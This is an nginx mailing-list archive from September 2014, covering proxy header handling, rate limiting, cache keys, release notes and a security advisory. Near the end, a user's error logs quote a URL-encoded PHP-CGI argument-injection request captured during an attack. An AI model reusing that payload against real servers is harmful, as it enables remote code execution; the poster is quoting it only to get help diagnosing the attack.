connection, but > I am running into difficulties with the nginx setting real_ip_recursive. [...] > #proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; [...] 
> This proxies requests onto my server as I expect, but I do not receive the > correct IP address in the X-Forwarded-For header. If I connect to the server > from a different IP address, spoofing the X-Forwarded-For header, I do not > get the IP address of the machine, but rather get the spoofed addresses. In your configuration, "proxy_set_header X-Forwarded-For" is commented out. Therefore, the X-Forwarded-For header is passed unmodified to the backend. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Mon Sep 15 13:36:23 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 15 Sep 2014 17:36:23 +0400 Subject: nginx chunked transfer encoding, cannot get it to work In-Reply-To: <67b49423c2351c8e547dd3b827386570.NginxMailingListEnglish@forum.nginx.org> References: <67b49423c2351c8e547dd3b827386570.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140915133623.GM59236@mdounin.ru> Hello! On Mon, Sep 15, 2014 at 08:08:10AM -0400, nkolev wrote: > How can I get the nginx chunked transfer encoding downlink to work? Chunked transfer encoding is used automatically when needed (and allowed by the protocol used), and automatically decoded when a client or a backend server uses it. I suspect you in fact want something like "unbuffered upload" instead, not chunked transfer encoding. This is not something nginx currently supports; see here for details: http://trac.nginx.org/nginx/ticket/251 -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Mon Sep 15 13:41:21 2014 From: nginx-forum at nginx.us (ianjoneill) Date: Mon, 15 Sep 2014 09:41:21 -0400 Subject: Nginx real_ip_recursive In-Reply-To: <20140915132549.GL59236@mdounin.ru> References: <20140915132549.GL59236@mdounin.ru> Message-ID: <6d7a2fb527f297688c71192da9123f75.NginxMailingListEnglish@forum.nginx.org> Thanks for your reply.
If I uncomment that line, the X-Forwarded-For header contains all of the IP addresses, as shown below: $ sudo /usr/sbin/tcpdump -i lo -A -s 0 'tcp port 8080 and ( ((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on lo, link-type EN10MB (Ethernet), capture size 65535 bytes 14:37:24.303617 IP localhost.50999 > localhost.8080: Flags [P.], seq 717883991:7 17884206, ack 1454594695, win 4099, options [nop,nop,TS val 2599031 ecr 2599030] , length 215 E...."@. at ............7".*. WV.Z............ .'.w.'.vHEAD / HTTP/1.0 Host: localhost X-Real-IP: 10.0.2.2 X-Forwarded-For: 1.1.1.1, 2.2.2.2, 10.0.2.2 Connection: close User-Agent: curl/7.30.0 Accept: */* i.e. I am getting the spoofed addresses and the real one. As I understood it, I should only get the real ip, i.e. 10.0.2.2. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253247,253250#msg-253250 From mdounin at mdounin.ru Mon Sep 15 15:12:45 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 15 Sep 2014 19:12:45 +0400 Subject: Nginx real_ip_recursive In-Reply-To: <6d7a2fb527f297688c71192da9123f75.NginxMailingListEnglish@forum.nginx.org> References: <20140915132549.GL59236@mdounin.ru> <6d7a2fb527f297688c71192da9123f75.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140915151245.GN59236@mdounin.ru> Hello! On Mon, Sep 15, 2014 at 09:41:21AM -0400, ianjoneill wrote: > Thanks for your reply. 
> > If I uncomment that line, the X-Forwarded-For header contains all of the IP > addresses, as shown below: > > $ sudo /usr/sbin/tcpdump -i lo -A -s 0 'tcp port 8080 and ( > ((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' > tcpdump: verbose output suppressed, use -v or -vv for full protocol decode > listening on lo, link-type EN10MB (Ethernet), capture size 65535 bytes > 14:37:24.303617 IP localhost.50999 > localhost.8080: Flags [P.], seq > 717883991:7 > 17884206, ack 1454594695, win 4099, options [nop,nop,TS val 2599031 ecr > 2599030] > , length 215 > E...."@. at ............7".*. > WV.Z............ > .'.w.'.vHEAD / HTTP/1.0 > Host: localhost > X-Real-IP: 10.0.2.2 > X-Forwarded-For: 1.1.1.1, 2.2.2.2, 10.0.2.2 > Connection: close > User-Agent: curl/7.30.0 > Accept: */* > > i.e. I am getting the spoofed addresses and the real one. As I understood > it, I should only get the real ip, i.e. 10.0.2.2. No, your understanding is wrong. The line in question will add the IP address of a client to the X-Forwarded-For list. It's up to a backend to either trust or not individual addresses in this list (and realip module is an example how this can be implemented). If you want nginx to pass only the IP of the client, without preserving previous contents of the X-Forwarded-For header, use $remote_addr variable instead of $proxy_add_x_forwarded_for: proxy_set_header X-Forwarded-For $remote_addr; Or just use X-Real-Ip as already set in your config to $remote_addr. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Mon Sep 15 15:41:49 2014 From: nginx-forum at nginx.us (ianjoneill) Date: Mon, 15 Sep 2014 11:41:49 -0400 Subject: Nginx real_ip_recursive In-Reply-To: <20140915151245.GN59236@mdounin.ru> References: <20140915151245.GN59236@mdounin.ru> Message-ID: <3ef5270960b9138cdb3463d6daa02061.NginxMailingListEnglish@forum.nginx.org> Thanks for your explanation. 
If I were to later add load balancers in front of my proxy server, would the $remote_addr IP be correct (i.e. the client IP) or would it be the IP of the load balancer? Thanks again for your help. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253247,253255#msg-253255 From b.arenal at gmail.com Mon Sep 15 15:47:38 2014 From: b.arenal at gmail.com (Bryan Arenal) Date: Mon, 15 Sep 2014 09:47:38 -0600 Subject: Is symmetric routing required for a nginx deployment? Message-ID: Hi, I'm investigating reverse proxy and content caching servers for a deployment at work, but our infrastructure is currently asymmetric, where the server would only see the inbound half of the conversation. Does nginx require symmetric configuration in order to see the three-way handshake and the subsequent GET? Thanks! Bryan -------------- next part -------------- An HTML attachment was scrubbed... URL: From lists at ruby-forum.com Mon Sep 15 16:16:58 2014 From: lists at ruby-forum.com (Wter S.) Date: Mon, 15 Sep 2014 18:16:58 +0200 Subject: Why Nginx Doesn't Implement FastCGI Multiplexing? In-Reply-To: <20140915104333.GH59236@mdounin.ru> References: <20130311121220.GX15378@mdounin.ru> <20140915104333.GH59236@mdounin.ru> Message-ID: <5326f1134ec41677f09a751eddc15e9c@ruby-forum.com> Then how is Nginx able to handle thousands of simultaneous requests (where some of them contain blocking IO operations) with only one process (or, let's say, 10 processes)? Thanks! Maxim Dounin wrote in post #1157635: > Hello! > > On Sun, Sep 14, 2014 at 09:22:48PM +0200, Wter S. wrote: > > > FastCGI doesn't imply PHP > As of now, implementation of the FastCGI protocol in PHP doesn't > support FastCGI multiplexing at all, and that's one of the reasons > why nginx doesn't implement FastCGI multiplexing as well. > -- > Maxim Dounin > http://nginx.org/ -- Posted via http://www.ruby-forum.com/.
From mdounin at mdounin.ru Mon Sep 15 19:14:48 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 15 Sep 2014 23:14:48 +0400 Subject: Nginx real_ip_recursive In-Reply-To: <3ef5270960b9138cdb3463d6daa02061.NginxMailingListEnglish@forum.nginx.org> References: <20140915151245.GN59236@mdounin.ru> <3ef5270960b9138cdb3463d6daa02061.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140915191448.GP59236@mdounin.ru> Hello! On Mon, Sep 15, 2014 at 11:41:49AM -0400, ianjoneill wrote: > Thanks for your explanation. If I were to later add load balancers in front > of my proxy server, would the $remote_addr IP be correct (i.e. the client > IP) or would it be the IP of the load balancer? By default it will be the IP of the load balancer. If your load balancer is able to provide the correct client IP via X-Forwarded-For or another header, the realip module can be used to instruct nginx to use the address provided instead. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Mon Sep 15 19:17:17 2014 From: nginx-forum at nginx.us (itpp2012) Date: Mon, 15 Sep 2014 15:17:17 -0400 Subject: [ANN] Windows nginx 1.7.5.3 WhiteRabbit Message-ID: <372bcf56f544623038af23c4c0b9aea6.NginxMailingListEnglish@forum.nginx.org> 18:42 15-9-2014 nginx 1.7.5.3 WhiteRabbit Based on nginx 1.7.5 (15-9-2014, last changeset 5834:ca63fc5ed9b1) with: + lua-upstream-nginx-module v0.2 (upgraded 14-9-2014) + echo-nginx-module v0.56 (upgraded 14-9-2014) + nginx-rtmp-module, v1.1.4 (upgraded 14-9-2014) includes https://github.com/arut/nginx-rtmp-module/pull/469 + lua-nginx-module v0.9.13 (upgraded 14-9-2014) + Re-engineered changeset 5820:3377f9459e99, nice try but no cigar + Source changes back ported + Source changes add-on's back ported + Changes for nginx_basic: Source changes back ported * Scheduled release: yes * Additional specifications: see 'Feature list' Builds can be found here: http://nginx-win.ecsds.eu/ Follow releases https://twitter.com/nginx4Windows Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,253259,253259#msg-253259 From nginx-forum at nginx.us Mon Sep 15 19:21:26 2014 From: nginx-forum at nginx.us (abstein2) Date: Mon, 15 Sep 2014 15:21:26 -0400 Subject: Max File Size Allowed In Cache Message-ID: Is there any way to limit the maximum size of an individual object in a proxy cache? Looking through the documentation ( http://nginx.org/en/docs/http/ngx_http_proxy_module.html ) I'm not seeing anything directly related to that. I might be misunderstanding the proxy_temp_file_write_size or proxy_max_temp_file_size commands, but outside of limiting the entire cache size with proxy_cache_path, I'm not seeing anything that says "this is the maximum size of an individual file that can sit in cache". Thanks! Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253260,253260#msg-253260 From mdounin at mdounin.ru Mon Sep 15 19:23:02 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 15 Sep 2014 23:23:02 +0400 Subject: Is symmetric routing required for a nginx deployment? In-Reply-To: References: Message-ID: <20140915192301.GQ59236@mdounin.ru> Hello! On Mon, Sep 15, 2014 at 09:47:38AM -0600, Bryan Arenal wrote: > Hi, > > I'm investigating reverse proxy and content caching servers for a > deployment at work but our infrastructure is currently asymmetric where the > server would only see the inbound half of the conversation. Does nginx > require symmetric configuration in order to see the three-way handshake and > the subsequent GET? Yes. -- Maxim Dounin http://nginx.org/ From b.arenal at gmail.com Mon Sep 15 19:50:24 2014 From: b.arenal at gmail.com (Bryan Arenal) Date: Mon, 15 Sep 2014 13:50:24 -0600 Subject: Is symmetric routing required for a nginx deployment? In-Reply-To: <20140915192301.GQ59236@mdounin.ru> References: <20140915192301.GQ59236@mdounin.ru> Message-ID: Thanks, Maxim -- I greatly appreciate your response. On Mon, Sep 15, 2014 at 1:23 PM, Maxim Dounin wrote: > Hello! 
> > On Mon, Sep 15, 2014 at 09:47:38AM -0600, Bryan Arenal wrote: > > > Hi, > > > > I'm investigating reverse proxy and content caching servers for a > > deployment at work but our infrastructure is currently asymmetric where > the > > server would only see the inbound half of the conversation. Does nginx > > require symmetric configuration in order to see the three-way handshake > and > > the subsequent GET? > > Yes. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Mon Sep 15 20:05:31 2014 From: nginx-forum at nginx.us (matt_l) Date: Mon, 15 Sep 2014 16:05:31 -0400 Subject: multiple limit_req_zone In-Reply-To: <1443902.uLfRjDonPW@vbart-laptop> References: <1443902.uLfRjDonPW@vbart-laptop> Message-ID: Valentin, Thank you so much for your example. It definitely helps. When you say "A client IP address serves as a key. [...]. One megabyte zone can keep about 16 thousand 64-byte states." Does that mean that 1 megabyte zone can keep the state on 16 thousand different sending IP addresses? What about the following 2 use cases: Use Case #1: One receives 10 requests per second from 10 different clients/IPs each of them sending 1 request per second Use Case #2: One receives 10 requests per second from 1 client/IP sending 10 requests per second. Should the zone size be different? Thank you. -matthieu Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253227,253263#msg-253263 From vbart at nginx.com Mon Sep 15 23:02:16 2014 From: vbart at nginx.com (Valentin V. 
Bartenev) Date: Tue, 16 Sep 2014 03:02:16 +0400 Subject: multiple limit_req_zone In-Reply-To: References: <1443902.uLfRjDonPW@vbart-laptop> Message-ID: <3889789.3Ipc0BMIgF@vbart-laptop> On Monday 15 September 2014 16:05:31 matt_l wrote: > Valentin, > Thank you so much for your example. It definitely helps. > When you say "A client IP address serves as a key. [...]. One megabyte zone > can keep about 16 thousand 64-byte states." Does that mean that 1 megabyte > zone can keep the state on 16 thousand different sending IP addresses? Yes. > What about the following 2 use cases: > Use Case #1: One receives 10 requests per second from 10 different > clients/IPs each of them sending 1 request per second > Use Case #2: One receives 10 requests per second from 1 client/IP sending > 10 requests per second. > Should the zone size be different? Each state needs to be kept as long as it has something in the bucket. If, in the first case, the clients don't send requests at the same time, but with a 100ms interval between each other, then room for one state would be enough. Otherwise, nginx will need up to 10 states to handle them. In the second case only one state is used. wbr, Valentin V. Bartenev From mdounin at mdounin.ru Tue Sep 16 12:00:27 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 16 Sep 2014 16:00:27 +0400 Subject: Why Nginx Doesn't Implement FastCGI Multiplexing? In-Reply-To: <5326f1134ec41677f09a751eddc15e9c@ruby-forum.com> References: <20130311121220.GX15378@mdounin.ru> <20140915104333.GH59236@mdounin.ru> <5326f1134ec41677f09a751eddc15e9c@ruby-forum.com> Message-ID: <20140916120027.GE59236@mdounin.ru> Hello! On Mon, Sep 15, 2014 at 06:16:58PM +0200, Wter S. wrote: > Then how is Nginx able to handle thousands of simultaneous requests (where > some of them contain blocking IO operations) with only one process (or > let's say 10 processes)? That's because nginx is an event-driven server and uses non-blocking IO whenever possible.
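Maxim's answer above captures the key idea: one worker multiplexes thousands of sockets through an OS readiness API (epoll on Linux, kqueue on BSD) and never blocks on any single connection. The following self-contained Python sketch illustrates that pattern in miniature, with the `selectors` module standing in for nginx's event machinery; it is an illustration only, not nginx code, and the function name is invented for the example.

```python
import selectors
import socket

def serve_ready_sockets(pairs):
    """Serve many connections from a single thread: register every socket
    with the OS readiness API and act only on sockets that actually have
    data, instead of blocking on any one of them."""
    sel = selectors.DefaultSelector()
    for idx, (srv, _cli) in enumerate(pairs):
        srv.setblocking(False)  # never let a single read block the loop
        sel.register(srv, selectors.EVENT_READ, data=idx)
    replies = {}
    while len(replies) < len(pairs):
        # select() returns only the sockets that are ready right now.
        for key, _mask in sel.select(timeout=1):
            replies[key.data] = key.fileobj.recv(64)
            sel.unregister(key.fileobj)
    sel.close()
    return replies

# Simulate three concurrent clients with connected socket pairs.
pairs = [socket.socketpair() for _ in range(3)]
for _srv, cli in pairs:
    cli.sendall(b"ping")

replies = serve_ready_sockets(pairs)

for srv, cli in pairs:
    srv.close()
    cli.close()
```

Blocking IO in a backend (the situation the poster asks about) stalls only the upstream, not this loop: the worker simply has no readiness event for that connection until the backend responds, and keeps servicing the others.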
-- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Tue Sep 16 14:46:20 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 16 Sep 2014 18:46:20 +0400 Subject: nginx-1.7.5 Message-ID: <20140916144620.GH59236@mdounin.ru> Changes with nginx 1.7.5 16 Sep 2014 *) Security: it was possible to reuse SSL sessions in unrelated contexts if a shared SSL session cache or the same TLS session ticket key was used for multiple "server" blocks (CVE-2014-3616). Thanks to Antoine Delignat-Lavaud. *) Change: now the "stub_status" directive does not require a parameter. *) Feature: the "always" parameter of the "add_header" directive. *) Feature: the "proxy_next_upstream_tries", "proxy_next_upstream_timeout", "fastcgi_next_upstream_tries", "fastcgi_next_upstream_timeout", "memcached_next_upstream_tries", "memcached_next_upstream_timeout", "scgi_next_upstream_tries", "scgi_next_upstream_timeout", "uwsgi_next_upstream_tries", and "uwsgi_next_upstream_timeout" directives. *) Bugfix: in the "if" parameter of the "access_log" directive. *) Bugfix: in the ngx_http_perl_module. Thanks to Piotr Sikora. *) Bugfix: the "listen" directive of the mail proxy module did not allow to specify more than two parameters. *) Bugfix: the "sub_filter" directive did not work with a string to replace consisting of a single character. *) Bugfix: requests might hang if resolver was used and a timeout occurred during a DNS request. *) Bugfix: in the ngx_http_spdy_module when using with AIO. *) Bugfix: a segmentation fault might occur in a worker process if the "set" directive was used to change the "$http_...", "$sent_http_...", or "$upstream_http_..." variables. *) Bugfix: in memory allocation error handling. Thanks to Markus Linnala and Feng Gu. 
-- Maxim Dounin http://nginx.org/en/donation.html From mdounin at mdounin.ru Tue Sep 16 14:46:52 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 16 Sep 2014 18:46:52 +0400 Subject: nginx-1.6.2 Message-ID: <20140916144652.GL59236@mdounin.ru> Changes with nginx 1.6.2 16 Sep 2014 *) Security: it was possible to reuse SSL sessions in unrelated contexts if a shared SSL session cache or the same TLS session ticket key was used for multiple "server" blocks (CVE-2014-3616). Thanks to Antoine Delignat-Lavaud. *) Bugfix: requests might hang if resolver was used and a DNS server returned a malformed response; the bug had appeared in 1.5.8. *) Bugfix: requests might hang if resolver was used and a timeout occurred during a DNS request. -- Maxim Dounin http://nginx.org/en/donation.html From mdounin at mdounin.ru Tue Sep 16 14:47:14 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 16 Sep 2014 18:47:14 +0400 Subject: nginx security advisory (CVE-2014-3616) Message-ID: <20140916144714.GP59236@mdounin.ru> Hello! A problem with SSL session cache in nginx was identified by Antoine Delignat-Lavaud. It was possible to reuse cached SSL sessions in unrelated contexts, allowing virtual host confusion attacks in some configurations by an attacker in a privileged network position (CVE-2014-3616). The problem affects nginx 0.5.6 - 1.7.4 if the same shared ssl_session_cache and/or ssl_session_ticket_key are used for multiple server{} blocks. The problem is fixed in nginx 1.7.5, 1.6.2. Further details can be found in the paper by Antoine Delignat-Lavaud et al., available at http://bh.ht.vc/vhost_confusion.pdf. -- Maxim Dounin http://nginx.org/en/donation.html From maxim at nginx.com Tue Sep 16 14:48:54 2014 From: maxim at nginx.com (Maxim Konovalov) Date: Tue, 16 Sep 2014 18:48:54 +0400 Subject: Bugfix: requests might hang if resolver was used [...] 
In-Reply-To: <53FC8922.1030807@nginx.com> References: <53FC8922.1030807@nginx.com> Message-ID: <54184DD6.1070606@nginx.com> On 8/26/14 5:18 PM, Maxim Konovalov wrote: > Hi Jason, > > On 8/26/14 12:47 PM, Jason Woods wrote: >> Hi, >> >> Where do I need to ask if a bug fix will be treated as major and >> ported to the 1.6 feature stable branch? >> >> Specifically, the following is having a significant impact for us, >> and makes using resolver extremely unstable with proxy_pass and >> variables. >> >> *) Bugfix: requests might hang if resolver was used and a DNS server >> returned a malformed response; the bug had appeared in 1.5.8. >> >> We're testing 1.7 mainline, but I would expect that due to existence >> and availability of 1.6, things like this would be fixed in that >> branch too, since it's still a "current" version? >> > We are now working on another bugfix in the nginx resolver code > and will consider backporting these patches to 1.6.2 (ETA ~2 weeks). > Done: http://nginx.org/en/CHANGES-1.6 -- Maxim Konovalov http://nginx.com From shmick at riseup.net Tue Sep 16 14:54:01 2014 From: shmick at riseup.net (shmick at riseup.net) Date: Wed, 17 Sep 2014 00:54:01 +1000 Subject: 2 certs, 1 domain, 1 IP Message-ID: <54184F09.6090205@riseup.net> Is it possible with SNI and nginx to have both an ECDSA and an RSA cert serving 1 website on 1 IP? Best practices? From thunderhill4 at gmail.com Tue Sep 16 16:10:05 2014 From: thunderhill4 at gmail.com (thunder hill) Date: Tue, 16 Sep 2014 21:40:05 +0530 Subject: authentication webserver behind nginx rps Message-ID: Hi, My reverse proxy setup is like this: http://nginx_rps ---> https://authwebser:443 (I don't have access to the authserver). The reverse proxy redirects correctly when I access http://nginx_rps through the browser. But when I type the credentials correctly in the web page, it gives a credential error. That means nginx is not correctly passing the credentials to the authserver over SSL.
What is wrong with my setup? Do I need to modify anything?

server {
    listen 80 default_server;
    listen [::]:80 default_server ipv6only=on;

    root /usr/share/nginx/html;
    index index.html index.htm;

    # Make site accessible from http://localhost/
    # server_name localhost;
    server_name XXXXXXXXX;
    access_log /var/log/nginx/access.log;

    location / {
        # First attempt to serve request as file, then
        # as directory, then fall back to displaying a 404.
        proxy_set_header Host $host;
        proxy_set_header Accept-Encoding "";
        proxy_set_header X-Real-IP $remote_addr;
        proxy_pass https://XXXXXXXXXX;
        #include /etc/nginx/proxy.conf;
        # try_files $uri $uri/ =404;
        # Uncomment to enable naxsi on this location
        # include /etc/nginx/naxsi.rules
    }
    # Only for nginx-naxsi used with nginx-naxsi-ui : process denied requests
}

What needs to be done so that the authentication happens correctly over SSL from nginx to the authserver? Regards T -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Tue Sep 16 18:24:18 2014 From: nginx-forum at nginx.us (jpsonweb) Date: Tue, 16 Sep 2014 14:24:18 -0400 Subject: using location.capture to post a form Message-ID: Hi All, I am calling a web application from nginx. I want to capture the response and post the response body as a post parameter to another application. I am doing something like this: local maken_res = ngx.location.capture("/test", { method = ngx.HTTP_POST ,body = "name = John"}) The post goes through but the receiving application does not get the request parameter. Any suggestion would really be appreciated. -Jyoti Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253311,253311#msg-253311 From agentzh at gmail.com Tue Sep 16 18:51:37 2014 From: agentzh at gmail.com (Yichun Zhang (agentzh)) Date: Tue, 16 Sep 2014 11:51:37 -0700 Subject: using location.capture to post a form In-Reply-To: References: Message-ID: Hello!
On Tue, Sep 16, 2014 at 11:24 AM, jpsonweb wrote: > I am calling a web application from nginx. I want to capture the response > and post the response body as a post parameter to another application. > I am doing something like this: > local maken_res = ngx.location.capture("/test", { method = ngx.HTTP_POST > ,body = "name = John"}) > The post goes through but the receiving application does not get the request > parameter. > I think you also need to pass the request header "Content-Type: application/x-www-form-urlencoded" to your subrequest because your "receiving application" might require that. Regards, -agentzh From nginx-forum at nginx.us Tue Sep 16 19:06:45 2014 From: nginx-forum at nginx.us (useopenid) Date: Tue, 16 Sep 2014 15:06:45 -0400 Subject: Client IP address Message-ID: We have a cluster of 4 nginx proxies behind a piranha load balancer setup. This morning we suffered a DoS attack; however, the "client" address appears to have only gotten logged correctly the first time; the rest have the virtual IP address targeted as the "client", and it's unclear how or why that would happen. The setup is in "direct return" mode... Thanks for any insights!
Sep 16 05:45:25 mailproxy-lb-01 nginx: 2014/09/16 05:45:25 [error] 16529#0: *111301 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 213.5.67.223, server: mail.wvi.com, request: "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1", upstream: "http://207.55.17.73:80/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%6 Sep 16 05:45:25 mailproxy-lb-01 nginx: 2014/09/16 05:45:25 [error] 16529#0: *111303 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 207.55.17.73, server: mail.wvi.com, request: "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0", upstream: 
"http://207.55.17.73:80/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%6 Sep 16 05:45:25 mailproxy-lb-01 nginx: 2014/09/16 05:45:25 [info] 16529#0: *111303 shutdown() failed (107: Transport endpoint is not connected) while sending to client, client: 207.55.17.73, server: mail.wvi.com, request: "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0", upstream: "http://207.55.17.73:80/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69 Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253313,253313#msg-253313 From nginx-forum at nginx.us Tue Sep 16 19:19:05 2014 From: nginx-forum at nginx.us (nfn) Date: Tue, 16 Sep 2014 15:19:05 -0400 Subject: 502 errors with nginx and php5-fpm In-Reply-To: <20140915105129.GI59236@mdounin.ru> References: <20140915105129.GI59236@mdounin.ru> Message-ID: <8ea43182ffac53651b7c063bbab9c90a.NginxMailingListEnglish@forum.nginx.org> Hi Just find out some clues and these are related to segmentation faults. 
In the PHP logs I have: WARNING: [pool www] child 20050 exited on signal 11 (SIGSEGV) after 57.791598 seconds from start In /var/log/messages I have: php5-fpm[2791]: segfault at fffffffa ip 0832d6d4 sp bf8e51c0 error 5 in php5-fpm[8048000+835000] I'm running Debian Wheezy with the dotdeb repo (5.5.16-1~dotdeb.1) and opcache with apcu. This never happened to me before. Should I try to change to xcache with memcache? Any suggestions? Thanks Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253117,253314#msg-253314 From aircw2005 at gmail.com Tue Sep 16 21:32:41 2014 From: aircw2005 at gmail.com (Wei Chen) Date: Tue, 16 Sep 2014 14:32:41 -0700 Subject: How to sort parameters in nginx cache key Message-ID: Hi: We are experiencing a low cache hit ratio in our Nginx server. It turned out that one reason is that clients may be sending the same requests with parameters in different orders, e.g. foo?p1=a&p2=b&p3=c foo?p2=b&p1=a&p3=c And our cache key is set as proxy_cache_key $uri$is_args$args; It is not feasible to change all clients to re-sort their URLs. Is there any way in Nginx to address that? Thanks, -Wei From vbart at nginx.com Tue Sep 16 22:04:44 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Wed, 17 Sep 2014 02:04:44 +0400 Subject: How to sort parameters in nginx cache key In-Reply-To: References: Message-ID: <3214902.JcCVj3zQQe@vbart-laptop> On Tuesday 16 September 2014 14:32:41 Wei Chen wrote: > Hi: > > We are experiencing a low cache hit ratio in our Nginx server. It turned out > that one reason is that clients may be sending the same requests with > parameters in different orders. > > e.g. > > foo?p1=a&p2=b&p3=c > foo?p2=b&p1=a&p3=c > > And our cache key is set as > proxy_cache_key $uri$is_args$args; > > It is not feasible to change all clients to re-sort their URLs. Is > there any way in Nginx to address that? > You can sort them manually: proxy_cache_key $uri$is_args$arg_p1&$arg_p2&$arg_p3; wbr, Valentin V.
Bartenev From nginx-forum at nginx.us Tue Sep 16 22:52:57 2014 From: nginx-forum at nginx.us (useopenid) Date: Tue, 16 Sep 2014 18:52:57 -0400 Subject: Client IP address In-Reply-To: References: Message-ID: <9bfca9ad32e7daaba52eeaa55c8dac0a.NginxMailingListEnglish@forum.nginx.org> Additional information: I caught it in the act, and something about this trigger and the setup is causing nginx to loop - the client IP address is actually right and nginx is proxying the request to itself as fast as it can. Restarting nginx stops the loop. This is version 0.7.65. I tried upgrading to 1.7.4 recently but the syslog support doesn't seem to work for mail and I haven't gotten a chance to try the old patches yet. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253313,253317#msg-253317 From nginx-forum at nginx.us Tue Sep 16 23:03:10 2014 From: nginx-forum at nginx.us (useopenid) Date: Tue, 16 Sep 2014 19:03:10 -0400 Subject: Client IP address In-Reply-To: <9bfca9ad32e7daaba52eeaa55c8dac0a.NginxMailingListEnglish@forum.nginx.org> References: 